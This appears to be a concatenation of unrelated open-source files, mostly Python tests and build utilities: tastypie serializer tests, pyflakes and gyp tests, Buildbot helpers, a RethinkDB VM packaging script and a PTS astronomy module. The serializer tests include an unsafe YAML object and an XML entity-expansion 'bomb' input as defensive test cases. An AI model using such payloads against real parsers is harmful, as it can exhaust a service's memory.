self.assertEqual(sample_1['name'], 'Daniel')
self.assertEqual(sample_1['age'], 27)
self.assertEqual(sample_1['date_joined'], u'2010-03-27')
self.assertEqual(sample_1['snowman'], u'☃')
def test_from_broken_json(self):
serializer = Serializer()
data = '{"foo": "bar",NO CARRIER'
self.assertRaises(BadRequest, serializer.from_json, data)
def test_round_trip_xml(self):
serializer = Serializer()
sample_data = self.get_sample2()
serialized = serializer.to_xml(sample_data)
# "response" tags need to be changed to "request" to deserialize properly.
# A string substitution works here.
serialized = serialized.decode('utf-8').replace('response', 'request')
unserialized = serializer.from_xml(serialized)
self.assertEqual(sample_data, unserialized)
def test_round_trip_json(self):
serializer = Serializer()
sample_data = self.get_sample2()
serialized = serializer.to_json(sample_data)
unserialized = serializer.from_json(serialized)
self.assertEqual(sample_data, unserialized)
def test_round_trip_yaml(self):
serializer = Serializer()
sample_data = self.get_sample2()
serialized = serializer.to_yaml(sample_data)
unserialized = serializer.from_yaml(serialized)
self.assertEqual(sample_data, unserialized)
def test_unsafe_yaml(self):
serializer = Serializer()
evil_data = UnsafeObject()
serialized = yaml.dump(evil_data)
self.assertRaises(yaml.constructor.ConstructorError,
serializer.from_yaml,
serialized)
def test_unsafe_xml(self):
"""
Entity expansion can be used to cause large memory usage after
deserialization for little memory usage from the attacker.
See https://pypi.python.org/pypi/defusedxml for more information.
"""
serializer = Serializer()
data = """<!DOCTYPE bomb [<!ENTITY a "evil chars">]>
<bomb>&a;</bomb>
"""
self.assertRaises(BadRequest, serializer.from_xml, data)
def test_to_jsonp(self):
serializer = Serializer()
sample_1 = self.get_sample1()
options = {'callback': 'myCallback'}
serialized = serializer.to_jsonp(sample_1, options=options)
serialized_json = serializer.to_json(sample_1)
self.assertEqual('myCallback(%s)' % serialized_json,
serialized)
def test_invalid_jsonp_characters(self):
"""
The newline characters \u2028 and \u2029 need to be escaped
in JSONP.
"""
serializer = Serializer()
jsonp = serializer.to_jsonp({'foo': u'Hello \u2028\u2029world!'},
{'callback': 'callback'})
self.assertEqual(jsonp, u'callback({"foo": "Hello \\u2028\\u2029world!"})')
def test_to_plist(self):
if not biplist:
return
serializer = Serializer()
sample_1 = self.get_sample1()
self.assertTrue(serializer.to_plist(sample_1).startswith(b'bplist00bybiplist1.0'))
def test_from_plist(self):
if not biplist:
return
serializer = Serializer()
sample_1 = serializer.from_plist(b'bplist00bybiplist1.0\x00\xd4\x01\x02\x03\x04\x05\x06\x07\x08WsnowmanSageTname[date_joineda&\x03\x10\x1bf\x00D\x00a\x00n\x00i\x00e\x00lZ2010-03-27\x15\x1e&*/;>@M\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X')
self.assertEqual(len(sample_1), 4)
self.assertEqual(sample_1[b'name'], 'Daniel')
self.assertEqual(sample_1[b'age'], 27)
self.assertEqual(sample_1[b'date_joined'], b'2010-03-27')
self.assertEqual(sample_1[b'snowman'], u'☃')
class ResourceSerializationTestCase(TestCase):
fixtures = ['note_testdata.json']
def setUp(self):
super(ResourceSerializationTestCase, self).setUp()
self.resource = NoteResource()
base_bundle = Bundle()
self.obj_list = [self.resource.full_dehydrate(self.resource.build_bundle(obj=obj)) for obj in self.resource.obj_get_list(base_bundle)]
self.another_resource = AnotherNoteResource()
self.another_obj_list = [self.another_resource.full_dehydrate(self.resource.build_bundle(obj=obj)) for obj in self.another_resource.obj_get_list(base_bundle)]
def test_to_xml_multirepr(self):
serializer = Serializer()
binary_xml = serializer.to_xml(self.obj_list)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<objects><object><content>This is my very first post using my shiny new API. Pretty sweet, huh?</content><created>2010-03-30T20:05:00</created><id type="integer">1</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>first-post</slug><title>First Post!</title><updated>2010-03-30T20:05:00</updated></object><object><content>The dog ate my cat today. He looks seriously uncomfortable.</content><created>2010-03-31T20:05:00</created><id type="integer">2</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>another-post</slug><title>Another Post</title><updated>2010-03-31T20:05:00</updated></object><object><content>My neighborhood\'s been kinda weird lately, especially after the lava flow took out the corner store. Granny can hardly outrun the magma with her walker.</content><created>2010-04-01T20:05:00</created><id type="integer">4</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>recent-volcanic-activity</slug><title>Recent Volcanic Activity.</title><updated>2010-04-01T20:05:00</updated></object><object><content>Man, the second eruption came on fast. Granny didn\'t have a chance. On the upshot, I was able to save her walker and I got a cool shawl out of the deal!</content><created>2010-04-02T10:05:00</created><id type="integer">6</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>grannys-gone</slug><title>Granny\'s Gone</title><updated>2010-04-02T10:05:00</updated></object></objects>')
def test_to_xml_single(self):
serializer = Serializer()
resource = self.obj_list[0]
binary_xml = serializer.to_xml(resource)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<object><content>This is my very first post using my shiny new API. Pretty sweet, huh?</content><created>2010-03-30T20:05:00</created><id type="integer">1</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>first-post</slug><title>First Post!</title><updated>2010-03-30T20:05:00</updated></object>')
def test_to_xml_nested(self):
serializer = Serializer()
resource = self.obj_list[0]
data = {
'stuff': {
'foo': 'bar',
'object': resource,
}
}
binary_xml = serializer.to_xml(data)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><stuff type="hash"><foo>bar</foo><object><content>This is my very first post using my shiny new API. Pretty sweet, huh?</content><created>2010-03-30T20:05:00</created><id type="integer">1</id><is_active type="boolean">True</is_active><resource_uri></resource_uri><slug>first-post</slug><title>First Post!</title><updated>2010-03-30T20:05:00</updated></object></stuff></response>')
def test_to_json_multirepr(self):
serializer = Serializer()
self.assertEqual(serializer.to_json(self.obj_list), '[{"content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}, {"content": "The dog ate my cat today. He looks seriously uncomfortable.", "created": "2010-03-31T20:05:00", "id": 2, "is_active": true, "resource_uri": "", "slug": "another-post", "title": "Another Post", "updated": "2010-03-31T20:05:00"}, {"content": "My neighborhood\'s been kinda weird lately, especially after the lava flow took out the corner store. Granny can hardly outrun the magma with her walker.", "created": "2010-04-01T20:05:00", "id": 4, "is_active": true, "resource_uri": "", "slug": "recent-volcanic-activity", "title": "Recent Volcanic Activity.", "updated": "2010-04-01T20:05:00"}, {"content": "Man, the second eruption came on fast. Granny didn\'t have a chance. On the upshot, I was able to save her walker and I got a cool shawl out of the deal!", "created": "2010-04-02T10:05:00", "id": 6, "is_active": true, "resource_uri": "", "slug": "grannys-gone", "title": "Granny\'s Gone", "updated": "2010-04-02T10:05:00"}]')
def test_to_json_single(self):
serializer = Serializer()
resource = self.obj_list[0]
self.assertEqual(serializer.to_json(resource), '{"content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}')
def test_to_json_decimal_list_dict(self):
serializer = Serializer()
resource = self.another_obj_list[0]
self.assertEqual(serializer.to_json(resource), '{"aliases": ["Mr. Smith", "John Doe"], "content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "meta": {"threat": "high"}, "owed": "102.57", "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}')
def test_to_json_nested(self):
serializer = Serializer()
resource = self.obj_list[0]
data = {
'stuff': {
'foo': 'bar',
'object': resource,
}
}
self.assertEqual(serializer.to_json(data), '{"stuff": {"foo": "bar", "object": {"content": "This is my very first post using my shiny new API. Pretty sweet, huh?", "created": "2010-03-30T20:05:00", "id": 1, "is_active": true, "resource_uri": "", "slug": "first-post", "title": "First Post!", "updated": "2010-03-30T20:05:00"}}}')
class StubbedSerializer(Serializer):
def __init__(self, *args, **kwargs):
super(StubbedSerializer, self).__init__(*args, **kwargs)
self.from_json_called = False
self.from_xml_called = False
self.from_yaml_called = False
self.from_html_called = False
self.from_jsonp_called = False
def from_json(self, data):
self.from_json_called = True
return True
def from_xml(self, data):
self.from_xml_called = True
return True
def from_yaml(self, data):
self.from_yaml_called = True
return True
def from_html(self, data):
self.from_html_called = True
return True
def from_jsonp(self, data):
self.from_jsonp_called = True
return True
class ContentHeaderTest(TestCase):
def test_deserialize_json(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'application/json')
self.assertTrue(serializer.from_json_called)
def test_deserialize_json_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'application/json; charset=UTF-8')
self.assertTrue(serializer.from_json_called)
def test_deserialize_xml(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'application/xml')
self.assertTrue(serializer.from_xml_called)
def test_deserialize_xml_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'application/xml; charset=UTF-8')
self.assertTrue(serializer.from_xml_called)
def test_deserialize_yaml(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/yaml')
self.assertTrue(serializer.from_yaml_called)
def test_deserialize_yaml_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/yaml; charset=UTF-8')
self.assertTrue(serializer.from_yaml_called)
def test_deserialize_jsonp(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'text/javascript')
self.assertTrue(serializer.from_jsonp_called)
def test_deserialize_jsonp_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('{}', 'text/javascript; charset=UTF-8')
self.assertTrue(serializer.from_jsonp_called)
def test_deserialize_html(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/html')
self.assertTrue(serializer.from_html_called)
def test_deserialize_html_with_charset(self):
serializer = StubbedSerializer()
serializer.deserialize('', 'text/html; charset=UTF-8')
self.assertTrue(serializer.from_html_called)
|
utkbansal/kuma
|
refs/heads/master
|
vendor/packages/pyflakes/test/test_return_with_arguments_inside_generator.py
|
53
|
from sys import version_info
from pyflakes import messages as m
from pyflakes.test.harness import TestCase, skipIf
class Test(TestCase):
@skipIf(version_info >= (3, 3), 'new in Python 3.3')
def test_return(self):
self.flakes('''
class a:
def b():
for x in a.c:
if x:
yield x
return a
''', m.ReturnWithArgsInsideGenerator)
@skipIf(version_info >= (3, 3), 'new in Python 3.3')
def test_returnNone(self):
self.flakes('''
def a():
yield 12
return None
''', m.ReturnWithArgsInsideGenerator)
@skipIf(version_info >= (3, 3), 'new in Python 3.3')
def test_returnYieldExpression(self):
self.flakes('''
def a():
b = yield a
return b
''', m.ReturnWithArgsInsideGenerator)
|
themiken/mtasa-blue
|
refs/heads/master
|
vendor/google-breakpad/src/tools/gyp/test/mac/gyptest-framework-headers.py
|
344
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that mac_framework_headers works properly.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
# TODO(thakis): Make this work with ninja, make. http://crbug.com/129013
test = TestGyp.TestGyp(formats=['xcode'])
CHDIR = 'framework-headers'
test.run_gyp('test.gyp', chdir=CHDIR)
# Test that headers are installed for frameworks
test.build('test.gyp', 'test_framework_headers_framework', chdir=CHDIR)
test.built_file_must_exist(
'TestFramework.framework/Versions/A/TestFramework', chdir=CHDIR)
test.built_file_must_exist(
'TestFramework.framework/Versions/A/Headers/myframework.h', chdir=CHDIR)
# Test that headers are installed for static libraries.
test.build('test.gyp', 'test_framework_headers_static', chdir=CHDIR)
test.built_file_must_exist('libTestLibrary.a', chdir=CHDIR)
test.built_file_must_exist('include/myframework.h', chdir=CHDIR)
test.pass_test()
|
EazzyLab/blog-scraper
|
refs/heads/master
|
Scraper/sync_http.py
|
1
|
import requests
def get_request(url, headers=None, proxy=None):
r = requests.get(url, headers=headers, proxies=proxy)
return r
|
ChameleonCloud/horizon
|
refs/heads/chameleoncloud/train
|
openstack_dashboard/test/unit/api/rest/test_config.py
|
3
|
# Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard.api.rest import config
from openstack_dashboard.test import helpers as test
class ConfigRestTestCase(test.TestCase):
def test_settings_config_get(self):
request = self.mock_rest_request()
response = config.Settings().get(request)
self.assertStatusCode(response, 200)
self.assertIn(b"REST_API_SETTING_1", response.content)
self.assertIn(b"REST_API_SETTING_2", response.content)
self.assertNotIn(b"REST_API_SECURITY", response.content)
|
pmisik/buildbot
|
refs/heads/master
|
master/buildbot/test/util/connector_component.py
|
5
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import types
from twisted.internet import defer
from buildbot.db import model
from buildbot.test.fake import fakemaster
from buildbot.test.util import db
from buildbot.test.util.misc import TestReactorMixin
class FakeDBConnector:
pass
class ConnectorComponentMixin(TestReactorMixin, db.RealDatabaseMixin):
"""
Implements a mock DBConnector object, replete with a thread pool and a DB
model. This includes a RealDatabaseMixin, so subclasses should not
instantiate that class directly. The connector appears at C{self.db}, and
the component should be attached to it as an attribute.
@ivar db: fake database connector
@ivar db.pool: DB thread pool
@ivar db.model: DB model
"""
@defer.inlineCallbacks
def setUpConnectorComponent(self, table_names=None, basedir='basedir', dialect_name='sqlite'):
self.setUpTestReactor()
"""Set up C{self.db}, using the given db_url and basedir."""
if table_names is None:
table_names = []
yield self.setUpRealDatabase(table_names=table_names, basedir=basedir)
self.db = FakeDBConnector()
self.db.pool = self.db_pool
self.db.master = fakemaster.make_master(self)
self.db.model = model.Model(self.db)
self.db._engine = types.SimpleNamespace(dialect=types.SimpleNamespace(name=dialect_name))
@defer.inlineCallbacks
def tearDownConnectorComponent(self):
yield self.tearDownRealDatabase()
# break some reference loops, just for fun
del self.db.pool
del self.db.model
del self.db
class FakeConnectorComponentMixin(TestReactorMixin):
# Just like ConnectorComponentMixin, but for working with fake database
def setUpConnectorComponent(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self, wantDb=True)
self.db = self.master.db
self.db.checkForeignKeys = True
self.insertTestData = self.db.insertTestData
return defer.succeed(None)
|
tectronics/arsenalsuite
|
refs/heads/master
|
cpp/apps/freezer/build.py
|
7
|
from blur.build import *
import os, sys
path = os.path.dirname(os.path.abspath(__file__))
rev_path = os.path.join(path,'../..')
instPrefix = ""
destDir = ""
if "DESTDIR" in os.environ:
destDir = os.environ["DESTDIR"]
elif sys.platform=='win32':
destDir = "c:/"
if sys.platform=="linux2":
instPrefix = destDir + "/etc/ab/"
else:
instPrefix = destDir + "/arsenalsuite/freezer/"
ini = IniConfigTarget("freezerini",path,'freezer.ini.template','freezer.ini',instPrefix)
kt = KillTarget("freezerkill", path, ["af.exe"])
nsi = NSISTarget("freezer_installer",path,"freezer.nsi")
nsi.pre_deps = ['freezerkill']
# Use Static python modules on windows
deps = None
if sys.platform == 'win32':
deps = ["sipstatic","pystonestatic","pystoneguistatic","pyclassesstatic","pyclassesuistatic","classes","libfreezer","pyfreezerstatic","pyabsubmitstatic",ini]
else:
deps = ["sipstatic","pystone","pystonegui","pyclasses","pyclassesui","classes","libfreezer","pyfreezer",ini]
QMakeTarget("freezer",path,"freezer.pro",deps,[nsi])
#if sys.platform=="linux2":
# rpm = RPMTarget('freezerrpm','freezer',path,'../../../rpm/spec/freezer.spec.template','1.0')
if __name__ == "__main__":
build()
|
xfournet/intellij-community
|
refs/heads/master
|
python/testData/intentions/PyAnnotateVariableTypeIntentionTest/notSuggestedForComprehensionTarget.py
|
19
|
[v<caret>ar for var in range(10)]
|
kool79/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyTypeCheckerInspection/StringStartsWith.py
|
49
|
'foo'.startswith('bar')
'foo'.startswith(('bar', 'baz'))
'foo'.startswith(<warning descr="Expected type 'Union[str, unicode, tuple]', got 'int' instead">2</warning>)
u'foo'.startswith(u'bar')
u'foo'.startswith((u'bar', u'baz'))
u'foo'.startswith(<warning descr="Expected type 'Union[str, unicode, tuple]', got 'int' instead">2</warning>)
|
elkingtonmcb/rethinkdb
|
refs/heads/next
|
scripts/VirtuaBuild/vm_build.py
|
46
|
# Copyright 2010-2012 RethinkDB, all rights reserved.
import os
import socket
import time
import socket
# pythonic discriminated union I guess, this is kind of retarded.
# actually 0 need for a base class it's really more like a comment
# that happens to be runable code
class RunError(Exception):
def __init__(self, str):
self.str = str
def __str__(self):
return repr(self.str)
def ensure_socket(host, port):
start_time = time.time()
success = False
while (time.time() - start_time < 5 * 60): # give up after some number of seconds
try:
s = socket.create_connection((host, port))
success = True
break
except:
time.sleep(20)
pass
if not success:
raise RunError("Failed to create a connection.")
return s
class Refspec():
pass
class Tag(Refspec):
def __init__(self, tagname):
self.val = tagname
class Branch(Refspec):
def __init__(self, branchname):
self.val = branchname
def remove_local(string):
if (string[len(string) - len('.local'):] == '.local'):
return string[:len(string) - len('.local')]
else:
return string
def rpm_install(path):
return "rpm -i %s" % path
def rpm_get_binary(path):
return "rpm -qpil %s | grep /usr/bin" % path
def rpm_uninstall(cmd_name):
return "which %s | xargs readlink -f | xargs rpm -qf | xargs rpm -e" % cmd_name
def deb_install(path):
return "dpkg -i %s" % path
def deb_get_binary(path):
return "dpkg -c %s | grep /usr/bin/rethinkdb-.* | sed 's/^.*\(\/usr.*\)$/\\1/'" % path
def deb_uninstall(cmd_name):
return "which %s | xargs readlink -f | xargs dpkg -S | sed 's/^\(.*\):.*$/\\1/' | xargs dpkg -r" % cmd_name
class VM():
def __init__(self, uuid, hostname, username = 'rethinkdb', rootname = 'root', vbox_username = 'rethinkdb', vbox_hostname = 'deadshot', startup = True):
self.uuid = uuid
self.hostname = hostname
self.username = username
self.rootname = rootname
self.vbox_username = vbox_username
self.vbox_hostname = vbox_hostname
if (startup):
os.system("ssh %s@%s VBoxManage startvm %s --type headless" % (self.vbox_username, self.vbox_hostname, self.uuid))
start_time = time.time()
while (self.command("true") != 0) and time.time() - start_time < 5 * 60: # give up after some number of seconds
time.sleep(3)
if self.command("true") != 0:
raise RunError("Failed to connect to Virtual Machine %s." % uuid)
def __del__(self):
os.system("ssh %s@%s VBoxManage controlvm %s poweroff" % (self.vbox_username, self.vbox_hostname, self.uuid))
def command(self, cmd_str, root = False, bg = False):
str = "ssh -o ConnectTimeout=1000 %s@%s \"%s\"" % ((self.rootname if root else self.username), self.hostname, (cmd_str + ("&" if bg else ""))) + ("&" if bg else "")
print str
return os.system(str)
# send a file into the tmp directory of the vm
def copy_to_tmp(self, path):
str = "scp %s %s@%s:/tmp/" % (path, self.username, self.hostname)
assert(os.system(str) == 0)
def popen(self, cmd_str, mode):
#print cmd_str
return os.popen("ssh %s@%s \"%s\"" % (self.username, self.hostname, cmd_str), mode)
class target():
def __init__(self, build_uuid, build_hostname, username, build_cl, res_ext, install_cl_f, uninstall_cl_f, get_binary_f, vbox_username, vbox_hostname):
self.build_uuid = build_uuid
self.build_hostname = build_hostname
self.username = username
self.build_cl = build_cl
self.res_ext = res_ext
self.install_cl_f = install_cl_f # path -> install cmd
self.uninstall_cl_f = uninstall_cl_f
self.get_binary_f = get_binary_f
self.vbox_username = vbox_username # username and hostname for running VirtualBox through ssh
self.vbox_hostname = vbox_hostname
def start_vm(self):
return VM(self.build_uuid, self.build_hostname, self.username, vbox_username=self.vbox_username, vbox_hostname=self.vbox_hostname) # startup = True
def get_vm(self):
return VM(self.build_uuid, self.build_hostname, self.username, vbox_username=self.vbox_username, vbox_hostname=self.vbox_hostname, startup=False)
def interact(self, short_name):
build_vm = self.start_vm()
print "%s is now accessible via ssh at %s@%s" % (short_name, self.username, self.build_hostname)
print "Leave this process running in the background and when you're done interrupt it to clean up the virtual machine."
while True:
time.sleep(1)
def run(self, refspec, short_name):
def purge_installed_packages():
old_binaries_raw = build_vm.popen("ls /usr/bin/rethinkdb*", "r").readlines()
old_binaries = map(lambda x: x.strip('\n'), old_binaries_raw)
print "Binaries scheduled for removal: ", old_binaries
for old_binary in old_binaries:
build_vm.command(self.uninstall_cl_f(old_binary), True)
if (not os.path.exists("Built_Packages")):
os.mkdir("Built_Packages")
build_vm = self.start_vm()
def run_checked(cmd, root = False, bg = False):
res = build_vm.command(cmd, root, bg)
if res != 0:
raise RunError(cmd + " returned on %d exit." % res)
def run_unchecked(cmd, root = False, bg = False):
res = build_vm.command(cmd, root, bg)
if isinstance(refspec, Tag):
run_checked("cd rethinkdb && git fetch && git fetch origin tag %s && git checkout -f %s" % (refspec.val, refspec.val))
elif isinstance(refspec, Branch):
run_checked("cd rethinkdb && git fetch && git checkout -f %s && git pull" % refspec.val)
else:
raise RunError("Invalid refspec type, must be branch or tag.")
run_checked("cd rethinkdb/src &&" + self.build_cl)
dir = build_vm.popen("pwd", 'r').readline().strip('\n')
p = build_vm.popen("find rethinkdb/build/packages -regex .*\\\\\\\\.%s" % self.res_ext, 'r')
raw = p.readlines()
res_paths = map((lambda x: os.path.join(dir, x.strip('\n'))), raw)
print res_paths
dest = os.path.abspath("Built_Packages")
for path in res_paths:
purge_installed_packages()
if (not os.path.exists(os.path.join(dest, short_name))):
os.mkdir(os.path.join(dest, short_name))
# install antiquated packages here
# if os.path.exists('old_versions'):
# for old_version in os.listdir('old_versions'):
# pkg = os.listdir(os.path.join('old_versions', old_version, short_name))[0]
# build_vm.copy_to_tmp(os.path.join('old_versions', old_version, short_name, pkg))
# run_checked(self.install_cl_f(os.path.join('/tmp', pkg)), True)
# print "Installed: ", old_version
# install current versions
target_binary_name = build_vm.popen(self.get_binary_f(path), "r").readlines()[0].strip('\n')
print "Target binary name: ", target_binary_name
run_checked(self.install_cl_f(path), True)
# run smoke test
run_unchecked("rm -r test_data")
run_checked("rethinkdb --cluster-port 11211 --directory test_data", bg = True)
print "Starting tests..."
s = ensure_socket(build_vm.hostname, 11213)
from smoke_install_test import test_against
if (not test_against(build_vm.hostname, 11213)):
raise RunError("Tests failed")
s.send("rethinkdb shutdown\r\n")
scp_string = "scp %s@%s:%s %s" % (self.username, self.build_hostname, path, os.path.join(dest, short_name))
print scp_string
os.system(scp_string)
# the code below is not updated
# find legacy binaries
# leg_binaries_raw = build_vm.popen("ls /usr/bin/rethinkdb*", "r").readlines()
# leg_binaries = map(lambda x: x.strip('\n'), leg_binaries_raw)
# leg_binaries.remove('/usr/bin/rethinkdb') #remove the symbolic link
# leg_binaries.remove(target_binary_name)
# for leg_binary in leg_binaries:
# print "Testing migration %s --> %s..." % (leg_binary, target_binary_name)
# file_name = leg_binary.replace('/', '_').replace('-','_').replace('.', '_')
# # create the old data
# run_unchecked("rm %s_1 %s_2" % (file_name, file_name))
# run_checked("%s -p 11211 -f %s_1 -f %s_2" % (leg_binary, file_name, file_name), bg = True)
# s = ensure_socket(build_vm.hostname, 11211)
# from smoke_install_test import throw_migration_data
# throw_migration_data(build_vm.hostname, 11211)
# s.send("rethinkdb shutdown\r\n")
# # run migration
# run_unchecked("rm %s_mig_1 %s_mig_2 %s_intermediate" % ((file_name, ) * 3))
# run_checked("%s migrate --in -f %s_1 -f %s_2 --out -f %s_mig_1 -f %s_mig_2 --intermediate %s_intermediate" % ((target_binary_name,) + ((file_name,) * 5)))
# # check to see if the data is there
# run_checked("%s -p 11211 -f %s_mig_1 -f %s_mig_2" % (target_binary_name, file_name, file_name), bg = True)
# s = ensure_socket(build_vm.hostname, 11211)
# from smoke_install_test import check_migration_data
# check_migration_data(build_vm.hostname, 11211)
# s.send("rethinkdb shutdown\r\n")
# print "Done"
purge_installed_packages()
# clean up is used to just shutdown the machine, kind of a hack but oh well
def clean_up(self):
build_vm = get_vm()
return # this calls the build_vms __del__ method which shutsdown the machine
def build(targets):
os.mkdir("Built_Packages")
map((lambda x: x.run()), targets)
|
SKIRT/PTS
|
refs/heads/master
|
magic/sources/extended.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.sources.extended Contains the ExtendedSourceFinder class.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import standard modules
import traceback
from collections import OrderedDict
# Import astronomical modules
from astropy.coordinates import Angle
# Import the relevant PTS classes and modules
from ..region.list import PixelRegionList, SkyRegionList
from ..basics.stretch import PixelStretch
from ..region.point import PixelPointRegion
from ..region.ellipse import PixelEllipseRegion, SkyEllipseRegion
from ..core.frame import Frame
from ...core.basics.configurable import Configurable
from ...core.tools import filesystem as fs
from ...core.basics.log import log
from ...core.basics.table import SmartTable
from ..core.mask import Mask
from ..basics.coordinate import SkyCoordinate
# -----------------------------------------------------------------
class ExtendedSourceTable(SmartTable):
"""
This class ...
"""
# Add column info
_column_info = OrderedDict()
_column_info["RA"] = (float, "deg", "right ascension")
_column_info["DEC"] = (float, "deg", "declination")
_column_info["Detected"] = (bool, None, "Has source detected")
_column_info["Flux"] = (float, "Jy", "flux for the point source")
_column_info["Flux error"] = (float, "Jy", "error on the flux value")
# -----------------------------------------------------------------
def __init__(self, *args, **kwargs):
"""
The constructor ...
:param args:
:param kwargs:
"""
# Call the constructor of the base class
super(ExtendedSourceTable, self).__init__(*args, **kwargs)
# Add column info
self.add_all_column_info(self._column_info)
# -----------------------------------------------------------------
def add_source(self, source):
"""
This function ...
:param source:
:return:
"""
if source is not None:
# Inform the user
log.info("Adding source " + str(source.index) + " to the table of extended sources ...")
# Get extended source properties
ra = source.position.ra
dec = source.position.dec
detected = source.has_detection
flux = None
flux_error = None
# Construct the row
values = [ra, dec, detected, flux, flux_error]
else: values = [None, None, None, None, None]
# Add a row
self.add_row(values)
# -----------------------------------------------------------------
def get_position(self, index):
"""
This function ...
:param index:
:return:
"""
return SkyCoordinate(ra=self["RA"][index] * self["RA"].unit, dec=self["DEC"][index] * self["DEC"].unit, unit="deg", frame="fk5")
# -----------------------------------------------------------------
def is_detected(self, index):
"""
This function ...
:param index:
:return:
"""
return self["Detected"][index]
# -----------------------------------------------------------------
def get_flux(self, index):
"""
This function ...
:param index:
:return:
"""
return self.get_quantity("Flux", index)
# -----------------------------------------------------------------
def get_flux_error(self, index):
"""
This function ...
:param index:
:return:
"""
return self.get_quantity("Flux error", index)
# -----------------------------------------------------------------
class ExtendedSourceFinder(Configurable):
"""
This class ...
"""
def __init__(self, *args, **kwargs):
"""
The constructor ...
:param kwargs:
"""
# Call the constructor of the base class
super(ExtendedSourceFinder, self).__init__(*args, **kwargs)
# -- Attributes --
# Initialize the sources list
self.sources = []
# The image frame
self.frame = None
# The mask covering objects that require special attentation (visual feedback)
self.special_mask = None
# The mask covering pixels that should be ignored
self.ignore_mask = None
# The mask of bad pixels
self.bad_mask = None
# The galactic catalog
self.catalog = None
# The region list
self.regions = None
# The segmentation map
self.segments = None
# The extended source table
self.table = None
# -----------------------------------------------------------------
def _run(self, **kwargs):
"""
This function ...
"""
# 2. Load the sources from the catalog
self.load_sources()
# 3. Detect the sources
if not self.config.weak: self.detect_sources()
else: self.set_detections()
# Find apertures
#if self.config.find_apertures: self.find_contours()
# 4. Create the region list
self.create_regions()
# 5. Create the segmentation map
self.create_segments()
# 10. Create the table
self.create_table()
# 6. Write
self.write()
# -----------------------------------------------------------------
def setup(self, **kwargs):
"""
This function ...
:param kwargs:
"""
# Call the setup function of the base class
super(ExtendedSourceFinder, self).setup()
# Inform the user
log.info("Setting up the extended source finder ...")
# Make a local reference to the image frame and catalog
self.frame = kwargs.pop("frame")
self.catalog = kwargs.pop("catalog")
# Masks
self.special_mask = kwargs.pop("special_mask", None)
self.ignore_mask = kwargs.pop("ignore_mask", None)
self.bad_mask = kwargs.pop("bad_mask", None)
# Create an empty frame for the segments
self.segments = Frame.zeros_like(self.frame)
# Initialize the table
self.table = ExtendedSourceTable()
# -----------------------------------------------------------------
def clear(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Clearing the extended source finder ...")
# Create a new list
self.sources = []
# Clear the frame
self.frame = None
# -----------------------------------------------------------------
@property
def principal(self):
"""
This function ...
:return:
"""
for source in self.sources:
if source is None: continue
if source.principal: return source
return None
# -----------------------------------------------------------------
@property
def companions(self):
"""
This function ...
:return:
"""
companions = []
for source in self.sources:
if source is None: continue
if source.companion: companions.append(source)
return companions
# -----------------------------------------------------------------
def load_sources(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Loading the extended sources from the catalog ...")
# Loop over the entries in the catalog
for index in range(len(self.catalog)):
# Get position
position = self.catalog.get_position(index)
# If the source falls outside of the frame, skip it
